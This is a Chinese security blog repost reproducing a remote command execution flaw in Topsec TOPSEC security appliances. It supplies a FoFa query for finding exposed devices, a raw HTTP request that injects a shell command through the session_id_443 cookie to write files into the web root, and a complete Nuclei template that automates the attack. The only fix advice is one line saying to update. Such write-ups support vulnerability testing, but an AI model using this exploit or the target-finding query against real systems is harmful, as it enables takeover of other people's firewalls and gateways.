【漏洞复现】天融信TOPSEC Cookie 远程命令执行

admin 2024年1月4日09:27:11评论132 views字数 1242阅读4分8秒阅读模式

免责声明

此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时私信我们

漏洞概述

天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie 处存在RCE漏洞,会导致服务器失陷。

【漏洞复现】天融信TOPSEC Cookie 远程命令执行

FoFa

title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"

漏洞复现

GET /cgi/maincgi.cgi?Url=check HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cookie: session_id_443=1|pwd  > /www/htdocs/site/image/123.txt;Connection: close

【漏洞复现】天融信TOPSEC Cookie 远程命令执行

【漏洞复现】天融信TOPSEC Cookie 远程命令执行

Nuclei Poc

id: topsec-cookie-rce

info:  name: 天融信TOPSEC Cookie 远程命令执行漏洞  author: rain  severity: critical  metadata:    fofa-query: title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"

http:  - raw:      - |        GET /cgi/maincgi.cgi?Url=check HTTP/1.1        Host: {{Hostname}}        Cookie: session_id_443=1|echo 'test' > /www/htdocs/site/image/test.txt;        User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36      - |        GET /site/image/test.txt HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36

    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body_2, 'test')"

修复建议

更新至最新版本:确保你的系统版本处于最新状态。厂商通常会发布包含安全修复的更新,及时应用这些更新以确保系统的安全性。

原文始发于微信公众号(知黑守白):【漏洞复现】天融信TOPSEC Cookie 远程命令执行

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月4日09:27:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】天融信TOPSEC Cookie 远程命令执行https://cn-sec.com/archives/2362131.html

发表评论

匿名网友 填写信息